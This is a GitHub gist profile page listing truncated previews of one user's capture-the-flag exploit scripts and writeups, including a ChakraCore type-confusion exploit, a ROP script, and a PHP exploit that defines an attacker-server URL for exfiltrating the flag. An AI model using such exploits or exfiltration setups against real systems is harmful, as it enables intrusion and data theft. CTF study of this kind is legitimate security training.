Skip to content

Instantly share code, notes, and snippets.

View eboda's full-sized avatar

Edgar Mayer eboda

117 followers · 4 following
View GitHub Profile
@eboda
eboda / keybase.md
Last active August 29, 2015 14:08

Keybase proof

I hereby claim:

  • I am eboda on github.
  • I am eboda (https://keybase.io/eboda) on keybase.
  • I have a public key whose fingerprint is F8B6 1392 DBFC 9B65 EB8C 4955 EBE1 91C1 FFBD 546A

To claim this, I am signing this object:

@eboda
eboda / split.sh
Created November 12, 2014 20:28
diff splitter
#!/bin/sh
sed '/^-/d' $1 | sed -e 's/^+/ /g' > $1.after
sed '/^+/d' $1 | sed -e 's/^-/ /g' > $1.before
@eboda
eboda / exploit.py
Created March 17, 2015 11:55
codegate ctf BOOKSTORE exploit
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
print "=== local exploit"
@eboda
eboda / template.py
Created May 7, 2015 13:10
pwn template
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / ropbaby.py
Last active August 29, 2015 14:21
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / go.py
Created December 29, 2016 22:10
hohoho solution
import sys
m = {
'0' : '$[$?/$$]',
'1' : '$?',
'2' : '$[$?+$?]',
'3' : '$[$?+$?+$?]',
'4' : '$[$?+$?+$?+$?]',
'5' : '$[$?+$?+$?+$?+$?]',
'6' : '$[($?+$?+$?)*($?+$?)]',
@eboda
eboda / exploit.js
Last active September 14, 2021 13:20
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else
@eboda
eboda / pwn.py
Last active June 11, 2017 08:15
SHA2017 crypto writeup
import requests
from PIL import Image
from StringIO import StringIO
def get_flag_rgb():
rgb = []
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
for i in range(20, 480, 40):
rgb.append(pixel(flag, i))
@eboda
eboda / sha2017.md
Created June 11, 2017 08:19
SHA2017 web100 writeup

SHA2017 web100

Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag

@eboda
eboda / exploit.php
Last active December 29, 2017 22:52
34C3 CTF urlstorage exploit
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}